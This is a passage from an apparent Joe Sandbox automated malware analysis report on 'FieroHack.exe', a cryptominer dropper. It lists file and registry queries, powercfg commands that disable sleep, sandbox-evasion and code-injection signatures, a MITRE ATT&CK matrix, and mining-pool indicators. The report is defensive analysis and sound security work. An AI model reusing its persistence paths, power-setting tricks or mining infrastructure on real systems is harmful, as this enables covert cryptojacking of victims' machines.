      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\AppData\Roaming\Sirus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Users\user\AppData\Roaming\WeMod.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
      Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      MITRE ATT&CK matrix (one line per tactic column; the number in parentheses is the signature count the report shows next to that technique):

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
      Execution: Windows Management Instrumentation (21); Service Execution (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
      Persistence: DLL Side-Loading (1); Windows Service (11); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
      Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (11); Process Injection (412); RC Scripts; Startup Items; Scheduled Task/Job; At
      Defense Evasion: Disable or Modify Tools (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); File Deletion (1); Masquerading (121); Virtualization/Sandbox Evasion (371); Access Token Manipulation (1); Process Injection (412)
      Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
      Discovery: File and Directory Discovery (2); System Information Discovery (25); Security Software Discovery (561); Process Discovery (2); Virtualization/Sandbox Evasion (371); Application Window Discovery (1); Remote System Discovery; System Owner/User Discovery; Network Sniffing
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
      Collection: Archive Collected Data (1); Input Capture (11); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
      Command and Control: Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
      Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1464754, Sample: FieroHack.exe, Startdate: 30/06/2024, Architecture: WINDOWS, Score: 100), recovered from the graph labels:

• Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus / Scanner detection for submitted sample; 6 other signatures.
• Network: pool.supportxmr.com, pool-fr.supportxmr.com; 141.94.96.144 (ports 49742, 9000; DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, Germany) contacted by the injected explorer.exe; svchost.exe contacts 127.0.0.1.
• FieroHack.exe starts WeMod.exe and Sirus.exe; drops C:\Users\user\AppData\Roaming\WeMod.exe (PE32+); signature: Drops large PE files.
• WeMod.exe drops C:\ProgramData\...\leirdnhqqedj.exe (PE32+); starts powershell.exe, two cmd.exe instances and 13 other processes; signatures: Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); Uses powercfg.exe to modify the power settings; 6 other signatures.
• leirdnhqqedj.exe drops C:\Windows\Temp\qkrjwvgkutvb.sys (PE32+); starts explorer.exe, powershell.exe, cmd.exe and 10 other processes; signatures: Query firmware table information (likely to detect VMs); Creates files in the system32 config directory; Injects code into the Windows Explorer (explorer.exe); 6 other signatures.
• explorer.exe: System process connects to network (likely due to code injection or exploit); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function).
• Sirus.exe: Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent); starts conhost.exe.
• powershell.exe (both instances): Loading BitLocker PowerShell Module.
• cmd.exe instances start conhost.exe, wusa.exe and choice.exe.

Source | Detection | Scanner | Label | Link
FieroHack.exe | 49% | ReversingLabs | Win32.Trojan.Generic |
FieroHack.exe | 46% | Virustotal | | Browse
FieroHack.exe | 100% | Avira | HEUR/AGEN.1338660 |
      No Antivirus matches
Source | Detection | Scanner | Label | Link
pool-fr.supportxmr.com | 4% | Virustotal | | Browse
pool.supportxmr.com | 9% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 141.94.96.195 | true | false | | unknown
pool.supportxmr.com | unknown | unknown | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
141.94.96.144 | unknown | Germany | | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | true

IP
127.0.0.1
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1464754
      Start date and time:2024-06-30 01:33:07 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 12m 15s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:71
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:FieroHack.exe
      Detection:MAL
      Classification:mal100.spyw.evad.mine.winEXE@98/19@1/2
      EGA Information:
      • Successful, ratio: 60%
      HCA Information:
      • Successful, ratio: 96%
      • Number of executed functions: 138
      • Number of non-executed functions: 47
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Override analysis time to 240000 for current running targets taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
      • Excluded IPs from analysis (whitelisted): 184.28.90.27
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target WeMod.exe, PID 4340 because there are no executed functions
• Execution Graph export aborted for target leirdnhqqedj.exe, PID 6796 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:34:16 | API Interceptor | 1x Sleep call for process: WeMod.exe modified
19:34:19 | API Interceptor | 43x Sleep call for process: powershell.exe modified
19:34:27 | API Interceptor | 3x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
141.94.96.144 | h2UFp4aCRq.exe | Get hash | malicious | LoaderBot, Xmrig | Browse |
 | curriculum_vitae-copie.vbs | Get hash | malicious | Xmrig | Browse |
 | curriculum_vitae-copie_(1).vbs | Get hash | malicious | Xmrig | Browse |
 | curriculum_vitae-copie.vbs | Get hash | malicious | Xmrig | Browse |
 | Vsob3IooE7.exe | Get hash | malicious | Xmrig | Browse |
 | GameBar.exe | Get hash | malicious | Xmrig | Browse |
 | FTrondtloadws.exe | Get hash | malicious | Xmrig | Browse |
 | file.exe | Get hash | malicious | Xmrig | Browse |
 | GoogleUpdate.exe | Get hash | malicious | Xmrig | Browse |
 | d.py | Get hash | malicious | PwnRig Miner | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
pool-fr.supportxmr.com | FieroHack.exe | Get hash | malicious | LummaC, Xmrig | Browse | 141.94.96.195
 | gVRqUej0ci.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.71
 | h2UFp4aCRq.exe | Get hash | malicious | LoaderBot, Xmrig | Browse | 141.94.96.144
 | setup.exe | Get hash | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine | Browse | 141.94.96.71
 | SecuriteInfo.com.Win32.Evo-gen.18867.15916.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.71
 | http://pool.supportxmr.com | Get hash | malicious | Unknown | Browse | 141.94.96.71
 | http://pool.supportxmr.com | Get hash | malicious | Unknown | Browse | 141.94.96.195
 | file.exe | Get hash | malicious | LoaderBot, Xmrig | Browse | 141.94.96.195
 | setup.EXE.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.195
 | updater.exe | Get hash | malicious | Xmrig | Browse | 141.94.96.71
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | wxa7qH57Zr.elf | Get hash | malicious | Mirai | Browse | 134.106.29.246
 | AlKRN3v4DY.elf | Get hash | malicious | Mirai | Browse | 194.95.210.148
 | f9DYXBf380.elf | Get hash | malicious | Mirai, Moobot | Browse | 141.94.189.51
 | tdQ8dOfnDZ.elf | Get hash | malicious | Mirai, Moobot | Browse | 134.104.88.95
 | iOf1YICai3.elf | Get hash | malicious | Mirai | Browse | 141.65.229.95
 | https://i.imgur.com/fIszkFh.png | Get hash | malicious | Unknown | Browse | 141.94.171.215
 | https://riprogramma.consegna.3-79-47-0.cprapid.com/brt/update.php?%276 | Get hash | malicious | Unknown | Browse | 141.95.171.139
 | http://3-79-47-0.cprapid.com/brt/update.php?%2704bd392f228f637be355 | Get hash | malicious | Unknown | Browse | 141.94.242.226
